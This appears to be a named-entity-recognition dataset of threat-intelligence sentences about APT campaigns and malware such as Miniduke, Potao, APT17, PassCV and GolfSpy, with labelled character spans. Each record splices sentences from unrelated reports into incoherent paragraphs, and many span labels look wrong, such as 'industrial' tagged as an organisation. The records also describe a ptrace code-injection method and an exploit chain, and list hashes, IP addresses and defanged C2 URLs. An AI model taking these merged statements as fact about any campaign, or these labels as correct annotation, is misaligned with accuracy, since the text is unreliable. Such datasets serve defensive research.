This downloader is unique per system and contains a customized backdoor written in Assembler .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 89, "end": 104, "label": "Organization"}, {"start": 300, "end": 302, "label": "System"}, {"start": 363, "end": 367, "label": "Organization"}, {"start": 371, "end": 376, "label": "Malware"}, {"start": 398, "end": 490, "label": "Malware"}]} {"text": "Then the app finds a process id value for the process it wants to inject with code . These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions . Now , threat actors are using well-known websites\u2014that they do not need to compromise to host C2 IP addresses . When loaded at system boot , the downloader uses a set of mathematical calculations to determine the computer - s unique fingerprint , and in turn uses this data to uniquely encrypt its communications later .", "spans": [{"start": 295, "end": 297, "label": "System"}]} {"text": "This is done using a series of syscalls as outlined below . The attackers try to lure targets through spear phishing emails that include compressed executables . They simply use the website for legitimate purposes , such as posting forum threads or creating profile pages . If the target system meets the pre - defined requirements , the malware will use Twitter ( unbeknownst to the user ) and start looking for specific tweets from pre - made accounts .", "spans": []} {"text": "The \" source process '' refers to the Zen trojan running as root , while the \" target process '' refers to the process to which the code is injected and [ pid ] refers to the target process pid value . We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries . APT17 went further to obfuscate their C2 IP address and employed a multi-layered approach for the malware to finally beacon the true C2 IP . 
These accounts were created by MiniDuke - s Command and Control ( C2 ) operators and the tweets maintain specific tags labeling encrypted URLs for the backdoors .", "spans": [{"start": 38, "end": 41, "label": "Malware"}, {"start": 263, "end": 273, "label": "Organization"}, {"start": 276, "end": 287, "label": "Organization"}, {"start": 292, "end": 319, "label": "Organization"}, {"start": 348, "end": 353, "label": "Organization"}, {"start": 386, "end": 388, "label": "System"}, {"start": 481, "end": 483, "label": "System"}]} {"text": "The source process checks the mapping between a process id and a process name . Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 . They used legitimate infrastructure\u2014the ability to post or create comments on forums and profile pages\u2014to embed a string that the malware would decode to find and communicate with the true C2 IP address . These URLs provide access to the C2s , which then provide potential commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": [{"start": 90, "end": 116, "label": "Organization"}, {"start": 119, "end": 122, "label": "Organization"}, {"start": 421, "end": 423, "label": "System"}]} {"text": "This is done by reading the /proc/ [ pid ] /cmdline file . Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments . This additional obfuscation puts yet another layer between APT17 and the security professionals attempting to chase them down . 
\u2022 Based on the analysis , it appears that the MiniDuke - s creators provide a dynamic backup system that also can fly under the radar \u2013 if Twitter isn - t working or the accounts are down , the malware can use Google Search to find the encrypted strings to the next C2 .", "spans": [{"start": 28, "end": 51, "label": "Indicator"}, {"start": 124, "end": 134, "label": "Organization"}, {"start": 137, "end": 150, "label": "Organization"}, {"start": 155, "end": 180, "label": "Organization"}, {"start": 183, "end": 196, "label": "Organization"}, {"start": 346, "end": 351, "label": "Organization"}, {"start": 461, "end": 482, "label": "Organization"}, {"start": 554, "end": 561, "label": "Organization"}, {"start": 609, "end": 616, "label": "Malware"}, {"start": 625, "end": 631, "label": "Organization"}]} {"text": "This very first step fails in Android 7.0 and higher , even with a root permission . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People's Republics . This BLACKCOFFEE variant contains one or more URLs that link to the biography sections of attacker-created profiles as well as forum threads that contain comments from those same profiles . This model is flexible and enables the operators to constantly change how their backdoors retrieve further commands or malcode as needed .", "spans": [{"start": 30, "end": 41, "label": "System"}, {"start": 197, "end": 224, "label": "Organization"}, {"start": 292, "end": 303, "label": "Malware"}, {"start": 477, "end": 613, "label": "Malware"}]} {"text": "The /proc filesystem is now mounted with a hidepid=2 parameter , which means that the process can not access other process /proc/ [ pid ] directory . The attacks appear to be geopolitically motivated and target high profile organizations . 
A URL is randomly selected and the malware searches at that location for an encoded IP address located between two tags , \u201c @MICR0S0FT \u201d and \u201c C0RP0RATI0N \u201d . Once the infected system locates the C2 , it receives encrypted backdoors that are obfuscated within GIF files and disguised as pictures that appear on a victim - s machine .", "spans": [{"start": 4, "end": 9, "label": "Indicator"}, {"start": 123, "end": 137, "label": "Indicator"}, {"start": 211, "end": 237, "label": "Organization"}, {"start": 408, "end": 423, "label": "Organization"}, {"start": 436, "end": 438, "label": "System"}, {"start": 453, "end": 509, "label": "Indicator"}, {"start": 514, "end": 571, "label": "Indicator"}]} {"text": "A ptrace_attach syscall is called . The objective of the attacks is clearly espionage \u2013 they involve gaining access to top legislative , executive and judicial bodies around the world . The malware then communicates directly with the retrieved and decoded IP address to receive commands and send stolen information . Once they are downloaded to the machine , they can fetch a larger backdoor which carries out the cyberespionage activities , through functions such as copy file , move file , remove file , make directory , kill process and of course , download and execute new malware and lateral movement tools .", "spans": [{"start": 410, "end": 439, "label": "Organization"}]} {"text": "This allows the source process to trace the target . The attackers have targeted a large number of organizations globally since early 2017 , with the main focus on the Middle East and North Africa ( MENA ) , especially Palestine . If the C2 server is discovered or shut down , the threat actors can update the encoded IP address on TechNet to maintain control of the victims \u2019 machines . 
The final stage backdoor connects to two servers , one in Panama and one in Turkey to receive the instructions from the attackers .", "spans": [{"start": 238, "end": 240, "label": "System"}, {"start": 332, "end": 339, "label": "System"}, {"start": 508, "end": 517, "label": "Organization"}]} {"text": "The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address . The attacks were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . BLACKCOFFEE supports an initial set of fifteen commands , including creating a reverse shell , uploading and downloading files , and enumerating files and processes . The attackers left a small clue in the code , in the form of the number 666 ( 0x29A hex ) before one of the decryption subroutines : \u2022 By analysing the logs from the command servers , we have observed 59 unique victims in 23 countries : For the detailed analysis and information on how to protect against the attack , please read :", "spans": [{"start": 222, "end": 231, "label": "Organization"}, {"start": 261, "end": 272, "label": "Malware"}, {"start": 432, "end": 441, "label": "Organization"}, {"start": 442, "end": 558, "label": "Indicator"}, {"start": 590, "end": 609, "label": "System"}, {"start": 612, "end": 662, "label": "Indicator"}]} {"text": "The source process reads /proc/ [ pid ] /maps to find where libc is located in the target process memory . Like BlackEnergy ( a.k.a Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus . The attackers can also extend BLACKCOFFEE \u2019s functionality through additional commands sent as shellcode . 
Together with our partner CrySyS Lab , we \u2019ve discovered two new , previously - unknown infection mechanisms for Miniduke .", "spans": [{"start": 25, "end": 45, "label": "Indicator"}, {"start": 112, "end": 123, "label": "System"}, {"start": 132, "end": 140, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 155, "end": 160, "label": "System"}, {"start": 349, "end": 360, "label": "Malware"}, {"start": 452, "end": 462, "label": "Organization"}, {"start": 539, "end": 547, "label": "Malware"}]} {"text": "By adding the previously calculated offset , it can get the address of the mmap function in the target process memory . The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives . APT17 : de56eb5046e518e266e67585afa34612 . These new infection vectors rely on Java and IE vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 156, "end": 161, "label": "System"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 235, "end": 267, "label": "Indicator"}, {"start": 306, "end": 333, "label": "Vulnerability"}, {"start": 344, "end": 360, "label": "Organization"}]} {"text": "The source process tries to determine the location of dlopen , dlsym , and dlclose functions in the target process . The first Potao campaign that we examined took place in August 2011 . APT17 : 195ade342a6a4ea0a58cfbfb43dc64cb . While inspecting one of the C&C servers of Miniduke , we have found files that were not related to the C&C code , but seemed to be prepared for infecting visitors using web - based vulnerabilities .", "spans": [{"start": 187, "end": 192, "label": "Organization"}, {"start": 195, "end": 227, "label": "Indicator"}, {"start": 258, "end": 269, "label": "System"}, {"start": 273, "end": 281, "label": "Malware"}, {"start": 284, "end": 426, "label": "Indicator"}]} {"text": "It uses the same technique as it used to determine the offset to the mmap function . 
In March 2014 , the gang behind Potao started using a new infection vector . APT17 : 4c21336dad66ebed2f7ee45d41e6cada . The page hxxp://[c2_hostname]/groups / business - principles.html is used as an starting point for the attack .", "spans": [{"start": 117, "end": 122, "label": "System"}, {"start": 143, "end": 159, "label": "System"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 170, "end": 202, "label": "Indicator"}, {"start": 205, "end": 314, "label": "Indicator"}]} {"text": "The source process writes the native shellcode into the memory region allocated by mmap . Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies . APT17 : 0370002227619c205402c48bde4332f6 . It consists of two frames , one for loading the decoy web page from a legitimate website ( copied from http://www.albannagroup.com/business-principles.html ) , and another for performing malicious activities ( hxxp://[c2_hostname]/groups / sidebar.html )", "spans": [{"start": 109, "end": 113, "label": "Organization"}, {"start": 127, "end": 132, "label": "System"}, {"start": 195, "end": 205, "label": "Organization"}, {"start": 210, "end": 227, "label": "Organization"}, {"start": 259, "end": 272, "label": "Organization"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 283, "end": 315, "label": "Indicator"}, {"start": 318, "end": 406, "label": "Malware"}, {"start": 409, "end": 473, "label": "Indicator"}, {"start": 478, "end": 525, "label": "Malware"}, {"start": 528, "end": 570, "label": "Indicator"}]} {"text": "Additionally , it also writes addresses of dlopen , dlsym , and dlclose into the same region , so that they can be used by the shellcode . As confirmation that the malware writers are still very active even at the time of this writing , ESET detected a new Potao sample compiled on July 20 , 2015 . APT17 : ac169b7d4708c6fa7fee9be5f7576414 . 
The second webpage , \u201c sidebar.html \u201d contains 88 lines , mostly JavaScript code , and works as a primitive exploit pack .", "spans": [{"start": 237, "end": 241, "label": "Organization"}, {"start": 257, "end": 269, "label": "System"}, {"start": 299, "end": 304, "label": "Organization"}, {"start": 307, "end": 339, "label": "Indicator"}, {"start": 365, "end": 397, "label": "Indicator"}, {"start": 400, "end": 462, "label": "Malware"}]} {"text": "Shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it . In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of Win32/Potao and Win32/FakeTC samples . APT17 : 130.184.156.62 . Its code identifies the victim \u2019s browser and then serves one of two exploits .", "spans": [{"start": 99, "end": 105, "label": "Organization"}, {"start": 194, "end": 198, "label": "Organization"}, {"start": 239, "end": 250, "label": "System"}, {"start": 255, "end": 275, "label": "System"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 286, "end": 300, "label": "Indicator"}]} {"text": "The source process changes the registers in the target process so that PC register points directly to the shellcode . Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated . APT17 : 69.80.72.165 . It also sends collected browser data to another script by sending a POST request to \u201c hxxp://[c2_hostname]/groups / count / write.php \u201d .", "spans": [{"start": 118, "end": 123, "label": "System"}, {"start": 248, "end": 255, "label": "System"}, {"start": 304, "end": 309, "label": "Organization"}, {"start": 312, "end": 324, "label": "Indicator"}, {"start": 413, "end": 460, "label": "Indicator"}]} {"text": "This is done using the ptrace syscall . 
Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the trojan . APT17 : 110.45.151.43 . The exploits are located in separate web pages .", "spans": [{"start": 60, "end": 65, "label": "System"}, {"start": 373, "end": 378, "label": "Organization"}, {"start": 381, "end": 394, "label": "Indicator"}]} {"text": "This diagram illustrates the whole process . The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates . APT17 : 121.101.73.231 . Clients using Internet Explorer version 8 are served with \u201c about.htm \u201d , for other versions of the browser and for any other browser capable of running Java applets , the JavaScript code loads \u201c JavaApplet.html \u201d .", "spans": [{"start": 49, "end": 61, "label": "Organization"}, {"start": 203, "end": 208, "label": "Organization"}, {"start": 211, "end": 225, "label": "Indicator"}, {"start": 242, "end": 269, "label": "System"}, {"start": 270, "end": 441, "label": "Indicator"}]} {"text": "Summary PHA authors go to great lengths to come up with increasingly clever ways to monetize their apps . The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . APT18 . 
The web page \u201c JavaApplet.html \u201d loads \u201c JavaApplet.class \u201d that implements a Java exploit for the recently discovered vulnerability CVE-2013 - 0422 .", "spans": [{"start": 110, "end": 122, "label": "Organization"}, {"start": 142, "end": 165, "label": "System"}, {"start": 217, "end": 234, "label": "Malware"}, {"start": 318, "end": 323, "label": "Organization"}, {"start": 341, "end": 356, "label": "Indicator"}, {"start": 367, "end": 383, "label": "Indicator"}, {"start": 386, "end": 458, "label": "Malware"}, {"start": 459, "end": 474, "label": "Vulnerability"}]} {"text": "Zen family PHA authors exhibit a wide range of techniques , from simply inserting an advertising SDK to a sophisticated trojan . he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . Dell SecureWorks Counter Threat Unit ( CTU ) analysts were recently engaged with a client thought to have been compromised by a threat group CTU researchers have named Threat Group-0416 ( TG-0416 ) . 
The code of the exploit is very similar to the one published in the Metasploit kit , but the inner class that disables the security manager is encoded differently , most likely to avoid detection .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 164, "end": 187, "label": "System"}, {"start": 239, "end": 256, "label": "Malware"}, {"start": 340, "end": 376, "label": "Organization"}, {"start": 379, "end": 382, "label": "Organization"}, {"start": 481, "end": 484, "label": "Organization"}, {"start": 508, "end": 525, "label": "Organization"}, {"start": 528, "end": 535, "label": "Organization"}, {"start": 540, "end": 622, "label": "Malware"}, {"start": 629, "end": 735, "label": "Malware"}]} {"text": "The app that resulted in the largest number of affected users was the click fraud version , which was installed over 170,000 times at its peak in February 2018 . PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release . Various artifacts from the initial phases of the incident provided strong indications of the existence of this particular threat group within the client's infrastructure . According to HTTP headers of the server , the applet was uploaded on February 11 , 2013 , one month after the Metasploit code was published and two days before Oracle issued a security alert regarding the vulnerability .", "spans": [{"start": 162, "end": 168, "label": "Organization"}, {"start": 251, "end": 255, "label": "System"}, {"start": 261, "end": 268, "label": "System"}, {"start": 273, "end": 282, "label": "System"}, {"start": 578, "end": 604, "label": "System"}, {"start": 725, "end": 731, "label": "Organization"}, {"start": 770, "end": 783, "label": "Vulnerability"}]} {"text": "The most affected countries were India , Brazil , and Indonesia . 
SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . It decodes the binary and writes it to a Java temporary directory with name \u201c ntuser.bin \u201d .", "spans": [{"start": 66, "end": 71, "label": "Organization"}, {"start": 90, "end": 104, "label": "System"}, {"start": 165, "end": 168, "label": "System"}, {"start": 176, "end": 183, "label": "System"}, {"start": 186, "end": 193, "label": "Organization"}]} {"text": "In most cases , these click fraud apps were uninstalled by the users , probably due to the low quality of the apps . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire . The threat actors achieved an initial foothold into the infrastructure via phishing email that convinced victims to install the Xyligan remote access Trojan ( RAT ) on a system . 
Then , it copies the system file \u201c rundll32.exe \u201d to the same directory with name \u201c ntuser.exe \u201d and runs it with \u201c ntuser.bin \u201d as a parameter , effectively loading the malicious DLL file .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 141, "end": 155, "label": "System"}, {"start": 216, "end": 219, "label": "System"}, {"start": 227, "end": 234, "label": "System"}, {"start": 312, "end": 326, "label": "System"}, {"start": 365, "end": 372, "label": "Malware"}, {"start": 387, "end": 393, "label": "Malware"}, {"start": 451, "end": 463, "label": "Indicator"}, {"start": 500, "end": 510, "label": "Indicator"}, {"start": 532, "end": 542, "label": "Indicator"}, {"start": 582, "end": 604, "label": "Malware"}]} {"text": "If Google Play Protect detects one of these apps , Google Play Protect will show a warning to users . The first new connection SPEAR identified was derived from an email address listed in Blue Coat Systems' original report on PassCV . The threat actors then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system . That DLL file is the main module of Miniduke , and it uses the URL http://twitter.com/TamicaCGerald to fetch commands .", "spans": [{"start": 3, "end": 22, "label": "System"}, {"start": 51, "end": 70, "label": "System"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 226, "end": 232, "label": "Organization"}, {"start": 272, "end": 281, "label": "Malware"}, {"start": 308, "end": 315, "label": "System"}, {"start": 452, "end": 484, "label": "Indicator"}]} {"text": "We are constantly on the lookout for new threats and we are expanding our protections . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform . 
Using host-based digital forensic analysis , CTU analysts observed the intruders using the native \u2018 at.exe \u2019 Windows task scheduler tool to move laterally within the infrastructure . The web page \u201c about.htm \u201d implements an exploit for Microsoft Internet Explorer 8 .", "spans": [{"start": 122, "end": 129, "label": "Organization"}, {"start": 254, "end": 257, "label": "Organization"}, {"start": 309, "end": 315, "label": "Indicator"}, {"start": 318, "end": 325, "label": "System"}, {"start": 407, "end": 416, "label": "Indicator"}, {"start": 445, "end": 474, "label": "System"}]} {"text": "Every device with Google Play includes Google Play Protect and all apps on Google Play are automatically and periodically scanned by our solutions . The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations . Many threat groups use lateral movement techniques , but this engagement allowed CTU analysts to not only further validate indicators of lateral movement , but also to look a bit closer at those indicators and expand the cluster of indicators surrounding the use of at.exe for lateral movement within the infrastructure . It uses a vulnerability discovered at the end December 2012 , CVE-2012 - 4792 .", "spans": [{"start": 18, "end": 29, "label": "System"}, {"start": 39, "end": 58, "label": "System"}, {"start": 75, "end": 86, "label": "System"}, {"start": 153, "end": 159, "label": "Organization"}, {"start": 239, "end": 253, "label": "Organization"}, {"start": 443, "end": 446, "label": "Organization"}, {"start": 628, "end": 634, "label": "Indicator"}, {"start": 746, "end": 761, "label": "Vulnerability"}]} {"text": "You can check the status of Google Play Protect on your device : Open your Android device 's Google Play Store app . 
Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia . Threat actors accessed the source host via the hcdLoader RAT . The code is also very similar to the Metasploit version of the exploit , while the payload part of the shellcode has been written by the Miniduke authors re - using the backdoor \u2019s code .", "spans": [{"start": 28, "end": 47, "label": "System"}, {"start": 93, "end": 110, "label": "System"}, {"start": 141, "end": 147, "label": "Organization"}, {"start": 304, "end": 313, "label": "Malware"}, {"start": 320, "end": 452, "label": "Indicator"}, {"start": 457, "end": 473, "label": "Organization"}]} {"text": "Tap Menu > Play Protect . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December . The sole indicator on the source host that at.exe had been run was an application Prefetch file ( C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf ) that was created when the tool was executed . The Metasploit code was released on December 29 , 2012 and the vulnerability was officialy fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": [{"start": 55, "end": 83, "label": "Organization"}, {"start": 367, "end": 373, "label": "Indicator"}, {"start": 422, "end": 460, "label": "Indicator"}, {"start": 572, "end": 585, "label": "Vulnerability"}]} {"text": "Look for information about the status of your device . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
Beyond the file system metadata for the Prefetch file ( creation and last modification times ) and the last execution time within the file metadata , CTU analysts did not observe any indicators of value on the source host . [ c2_hostname ] The purpose of the shellcode is to download a GIF image file from URL hxxp://[c2_hostname]/groups / pic.gif , then search for and decrypt the hidden PE file inside of it .", "spans": [{"start": 59, "end": 64, "label": "Malware"}, {"start": 88, "end": 118, "label": "Vulnerability"}, {"start": 121, "end": 134, "label": "Vulnerability"}, {"start": 175, "end": 187, "label": "Malware"}, {"start": 254, "end": 262, "label": "System"}, {"start": 364, "end": 367, "label": "Organization"}]} {"text": "Hashes of samples Type Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04 BBSRAT is typically packaged within a portable executable file , although in a few of the observed instances , a raw DLL was discovered to contain BBSRAT . Two files are created for the task at approximately the same time : C:\\Windows\\System32\\Tasks\\At1 and C:\\Windows\\Tasks\\At1.job . 
The PE file also appeared to be a modification of the Miniduke 's main backdoor module that uses the same Twitter URL as the Java payload .", "spans": [{"start": 61, "end": 119, "label": "Indicator"}, {"start": 120, "end": 184, "label": "Indicator"}, {"start": 197, "end": 246, "label": "Indicator"}, {"start": 247, "end": 311, "label": "Indicator"}, {"start": 312, "end": 318, "label": "System"}, {"start": 459, "end": 465, "label": "System"}, {"start": 570, "end": 594, "label": "Indicator"}, {"start": 651, "end": 683, "label": "Malware"}, {"start": 722, "end": 734, "label": "Malware"}]} {"text": "Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d Mobile Campaign \u2018 Bouncing Golf \u2019 Affects Middle East We uncovered a cyberespionage campaign targeting Middle WildFire properly classifies BBSRAT malware samples as malicious . The first file is an Extensible Markup Language ( XML ) file that can be opened and viewed in a text editor . We have discovered and analysed two previously unknown infector vectors that were used in the MiniDuke attacks .", "spans": [{"start": 38, "end": 102, "label": "Indicator"}, {"start": 103, "end": 106, "label": "Malware"}, {"start": 114, "end": 130, "label": "Indicator"}, {"start": 131, "end": 195, "label": "Indicator"}, {"start": 214, "end": 227, "label": "Malware"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 335, "end": 357, "label": "System"}, {"start": 394, "end": 420, "label": "System"}, {"start": 423, "end": 426, "label": "System"}, {"start": 577, "end": 593, "label": "Organization"}]} {"text": "Eastern countries . This week we will discuss another Chinese nexus adversary we call Samurai Panda . The second file follows a decodable binary format . 
As previously recommended , updating Windows , Java and Adobe Reader to the latest versions should provide a basic level of defense against the known Miniduke attacks .", "spans": [{"start": 201, "end": 205, "label": "Organization"}, {"start": 210, "end": 222, "label": "System"}, {"start": 294, "end": 320, "label": "Organization"}]} {"text": "We named this campaign \u201c Bouncing Golf \u201d based on the malware \u2019 s code in the package named \u201c golf. \u201d June 18 , 2019 We uncovered a cyberespionage campaign targeting Middle Eastern countries . Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims . The operating system also creates a registry key within the software registry hive that is specifically associated with the creation of the scheduled task on the destination host : Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1 . Researchers have uncovered an ongoing cyberespionage campaign targeting more than 30 online video game companies over the past four years .", "spans": [{"start": 25, "end": 38, "label": "Malware"}, {"start": 193, "end": 206, "label": "Organization"}, {"start": 545, "end": 562, "label": "System"}, {"start": 611, "end": 622, "label": "Organization"}, {"start": 641, "end": 672, "label": "Organization"}, {"start": 696, "end": 723, "label": "Organization"}]} {"text": "We named this campaign \u201c Bouncing Golf \u201d based on the malware \u2019 s code in the package named \u201c golf. \u201d The malware involved , which Trend Micro detects as AndroidOS_GolfSpy.HRX , is notable for its wide range of cyberespionage capabilities . Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary . 
The Task Scheduler service names the tasks , so subsequent tasks are named At2 , At3 , and so on . The companies infected by the malware primarily market so - called massively multiplayer online role - playing games .", "spans": [{"start": 25, "end": 38, "label": "Malware"}, {"start": 131, "end": 142, "label": "Organization"}, {"start": 154, "end": 175, "label": "Malware"}, {"start": 307, "end": 318, "label": "Organization"}, {"start": 587, "end": 594, "label": "Malware"}, {"start": 624, "end": 673, "label": "Malware"}]} {"text": "Malicious codes are embedded in apps that the operators repackaged from legitimate applications . Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary . FIN7.5 : the infamous cybercrime rig FIN7 continues its activities . They 're mostly located in South East Asia , but are also in the US , Germany , Japan , China , Russia , Brazil , Peru , and Belarus , according to a release published Thursday by researchers from antivirus provider Kaspersky Lab .", "spans": [{"start": 306, "end": 312, "label": "Organization"}, {"start": 343, "end": 347, "label": "Organization"}, {"start": 572, "end": 590, "label": "Organization"}, {"start": 591, "end": 604, "label": "Organization"}]} {"text": "Monitoring the command and control ( C & C ) servers used by Bouncing Golf , we \u2019 ve so far observed more than 660 Android devices infected with GolfSpy . Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes . On August 1, 2018 , the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig . 
The attackers work from computers with Chinese and Korean language configurations .", "spans": [{"start": 61, "end": 74, "label": "Malware"}, {"start": 115, "end": 122, "label": "System"}, {"start": 145, "end": 152, "label": "Malware"}, {"start": 336, "end": 357, "label": "Organization"}, {"start": 441, "end": 445, "label": "Organization"}, {"start": 467, "end": 476, "label": "Organization"}, {"start": 487, "end": 544, "label": "System"}]} {"text": "Much of the information being stolen appear to be military-related . These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . They used their unauthorized access to obtain digital certificates that were later exploited in malware campaigns targeting other industries and political activists .", "spans": [{"start": 244, "end": 248, "label": "Organization"}, {"start": 470, "end": 487, "label": "Organization"}, {"start": 504, "end": 514, "label": "Organization"}, {"start": 519, "end": 538, "label": "Organization"}]} {"text": "The campaign \u2019 s attack vector is also interesting . When conducting programmatic espionage activity , it can presumably become quite confusing if the attacker targets a heavy industry company , an avionics program , and seven other unique targets as to which infected host you will collect what information from . Interestingly , this threat actor created fake companies in order to hire remote pentesters , developers and interpreters to participate in their malicious business . 
So far , there 's no evidence that customers of the infected game companies were targeted , although in at least one case , malicious code was accidentally installed on gamers ' computers by one of the infected victim companies .", "spans": [{"start": 170, "end": 192, "label": "Organization"}, {"start": 517, "end": 557, "label": "Organization"}, {"start": 606, "end": 620, "label": "Malware"}, {"start": 651, "end": 669, "label": "Organization"}, {"start": 680, "end": 709, "label": "Organization"}]} {"text": "These repackaged , malware-laden apps are neither on Google Play nor popular third-party app marketplaces , and we only saw the website hosting the malicious apps being promoted on social media when we followed GolfSpy \u2019 s trail . These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module . The main goal behind its malicious activities was to steal financial assets from companies , such as debit cards , or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts . Kaspersky said there was another case of end users being infected by the malware , which is known as \" Winnti . \"", "spans": [{"start": 53, "end": 64, "label": "System"}, {"start": 211, "end": 218, "label": "Malware"}, {"start": 264, "end": 273, "label": "System"}, {"start": 283, "end": 309, "label": "System"}, {"start": 640, "end": 649, "label": "Organization"}, {"start": 709, "end": 720, "label": "Malware"}, {"start": 743, "end": 749, "label": "Malware"}]} {"text": "We were also able to analyze some GolfSpy samples sourced from the Trend Micro mobile app reputation service . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . 
In 2018-2019 , researchers of Kaspersky Lab \u2019s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures ( TTPs ) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . \" Having infected gaming companies that do business in MMORPG , the attackers potentially get access to millions of users , \" the researchers wrote .", "spans": [{"start": 34, "end": 41, "label": "Malware"}, {"start": 67, "end": 78, "label": "Organization"}, {"start": 132, "end": 142, "label": "Organization"}, {"start": 172, "end": 207, "label": "Vulnerability"}, {"start": 269, "end": 278, "label": "Organization"}, {"start": 286, "end": 319, "label": "Organization"}, {"start": 420, "end": 424, "label": "Organization"}, {"start": 550, "end": 566, "label": "Organization"}, {"start": 600, "end": 609, "label": "Organization"}]} {"text": "Also of note is Bouncing Golf \u2019 s possible connection to a previously reported mobile cyberespionage campaign that researchers named Domestic Kitten . Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . \" So far we do n't have data that the attackers stole from common users but we do have at least two incidents when Winnti malware had been planted on an online game update server and", "spans": [{"start": 16, "end": 29, "label": "Malware"}, {"start": 133, "end": 148, "label": "Malware"}, {"start": 151, "end": 161, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 389, "end": 393, "label": "Organization"}, {"start": 540, "end": 554, "label": "Malware"}]} {"text": "The strings of code , for one , are similarly structured . 
